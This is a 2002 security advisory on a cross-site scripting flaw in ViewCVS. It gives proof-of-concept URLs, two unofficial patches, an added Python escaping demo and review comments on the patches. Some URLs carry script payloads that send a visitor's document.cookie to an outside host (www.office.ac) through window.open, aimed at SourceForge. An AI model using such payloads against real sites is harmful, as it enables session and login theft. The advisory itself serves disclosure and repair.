21st May 2002 [SBWID-5353]
COMMAND
ViewCVS cross-site scripting bug
SYSTEMS AFFECTED
ViewCVS 0.9.2 and below
PROBLEM
office [http://www.office.ac/] says:
ViewCVS is a WWW interface for CVS repositories. It is widely used in the
free software community and the open source community. Unfortunately, it has
a cross-site scripting vulnerability.
Proof
-----
If you access a URL like the following:
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>
The former URL is valid for Internet Explorer 6.0 and Opera 6.01, but not
valid for Netscape 4.78, Netscape 6.2.2 or Mozilla 0.9.9 on Windows XP.
All these URLs can do is make a popup window appear.
Example
-------
For example, you can see the vulnerability at SourceForge.net (the
vendor's site is on SourceForge.net).
If you access the following sample URL, your cookie (including your
login information and session information for SourceForge.net) is
stolen by my site (http://www.office.ac).
The stolen cookie information from Internet Explorer 6.0 includes your
login information and session information for SourceForge.net. But
the stolen cookie information from Opera 6.01 and Mozilla 0.9.9
includes only the user name, and the cookie information from Netscape 4.78
and 6.2.2 is empty. (I don't know why.)
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
The ViewCVS at SourceForge.net is not the newest version. You can see
the vulnerability in the newest version of ViewCVS at GNU:
http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert("hello")</script>
http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>
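The reflection the two proof URLs depend on, and the output-time escaping that contains it, as an added Python 3 example that is not part of the advisory or of ViewCVS. The page template and the two parameter contexts (element text for cvsroot, a quoted href attribute for sortby) are assumed stand-ins for ViewCVS's own output; escape_no_quotes mimics the default of Python 2's cgi.escape that the first patch in the SOLUTION section relies on.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the two reflection points the proof URLs hit:
# `cvsroot` is echoed into element text, `sortby` into a quoted href attribute.
PAGE_TEMPLATE = ('<h1>Repository: {cvsroot}</h1>\n'
                 '<a href="?sortby={sortby}">sort</a>')

# The two proof URLs from the advisory, used verbatim as sample input.
CVSROOT_URL = ('http://target_site/cgi-bin/viewcvs.cgi/viewcvs/'
               '?cvsroot=<script>alert("hello")</script>')
SORTBY_URL = ('http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/'
              '?sortby=rev"><script>alert("hello")</script>')

def parse_query(url):
    """First value of each query parameter, as the ViewCVS parse loop takes it."""
    pairs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in pairs.items()}

def escape_no_quotes(s):
    """What Python 2's cgi.escape did by default: only &, < and >."""
    return html.escape(s, quote=False)

def escape_all(s):
    """Also turn " and ' into entities, so a value cannot leave an attribute."""
    return html.escape(s, quote=True)

def render(params, escape=lambda s: s):
    """Render the page, applying `escape` to each parameter at output time.
    The identity default reproduces the unpatched, verbatim reflection."""
    return PAGE_TEMPLATE.format(cvsroot=escape(params.get("cvsroot", "")),
                                sortby=escape(params.get("sortby", "rev")))

def href_value(page):
    """The href a browser would see: the first double-quoted value after href=."""
    return re.search(r'href="([^"]*)"', page).group(1)

def script_injected(page):
    """Detection check for a response body: does a raw <script> tag survive?"""
    return "<script" in page.lower()

if __name__ == "__main__":
    for url in (CVSROOT_URL, SORTBY_URL):
        params = parse_query(url)
        print("raw reflection injects a tag:", script_injected(render(params)))
        # Escaping without quotes removes the tag, but `"` still ends the href early.
        print("href, quote=False:", href_value(render(params, escape_no_quotes)))
        print("href, quote=True :", href_value(render(params, escape_all)))
```

The truncated href under escape_no_quotes is the observable sign that a parameter has left its attribute context, which is what the second proof URL exploits even after angle brackets are encoded.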
SOLUTION
No official patch yet; check the unofficial ones below:
Patch by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper NIKKI System
Project (http://www.h14m.org/):
--- viewcvs.py.orig Fri Dec 14 23:14:39 2001
+++ viewcvs.py Sun Mar 31 15:24:34 2002
@@ -172,7 +172,7 @@
# parse the query params into a dictionary (and use defaults)
query_dict = default_settings.copy()
for name, values in cgi.parse().items():
- query_dict[name] = values[0]
+ query_dict[name] = cgi.escape(values[0])
# set up query strings, prefixed by question marks and ampersands
query = sticky_query(query_dict)
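Review bot: `cgi.escape(values[0])` on the `+` line uses the default quote handling, so `&`, `<` and `>` are converted but `"` and `'` pass through untouched; the `sortby=rev"><script>` proof above depends on a `"` to leave the attribute value, so the tag is blocked here but the quote still closes the attribute early. If escaping is done at this point, pass `quote=True`. Escaping at parse time also means every later consumer of `query_dict` receives entity-encoded text rather than the raw parameter, including `sticky_query(query_dict)` two lines down, which re-embeds the values in URLs, and whatever looks up the repository from `cvsroot`; escaping at the point of HTML output keeps those paths correct.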
This code comes from Taku YASUI <tach@sourceforge.jp> /
Sourceforge.jp (http://sourceforge.jp/), who had offered the former patch to
the ViewCVS team:
RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
retrieving revision 1.107
retrieving revision 1.108
diff -u -r1.107 -r1.108
--- viewcvs/viewcvs/lib/viewcvs.py 2002/02/22 09:20:46 1.107
+++ viewcvs/viewcvs/lib/viewcvs.py 2002/04/01 01:32:16 1.108
@@ -180,8 +180,14 @@
# parse the query params into a dictionary (and use defaults)
query_dict =3D default_settings.copy()
+
+ # RE that ViewCVS doesn\'t use in any URL, but a CSS attack might
+ re_url_validate =3D re.compile(\'\\\'|\"|<|>\')
for name, values in cgi.parse().items():
- query_dict[name] =3D values[0]
+ # do not accept values that contain non-ViewCVS characters
+ # except for search
+ if not re.search(re_url_validate, values[0]) or name =3D=3D \'search\'=
:
+ query_dict[name] =3D values[0]
# set up query strings, prefixed by question marks and ampersands
query = sticky_query(query_dict)
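Review bot: the `or name =3D=3D 'search'` exemption on the `if` line leaves the `search` parameter free to carry `'`, `"`, `<` and `>`, so this denylist only holds if every template that renders the search value escapes it at output time; a comment pointing at where that happens would make the exemption reviewable. Rejection is also silent: a value matching `re_url_validate` is simply not stored, so the entry from `default_settings` is used with no indication to the user. As transcribed the hunk carries quoted-printable residue (`=3D` for `=`, and a trailing `=` soft line break after `'search'`), so it needs decoding before `patch` will apply it, and it assumes `re` is already imported in viewcvs.py, which the hunk does not show.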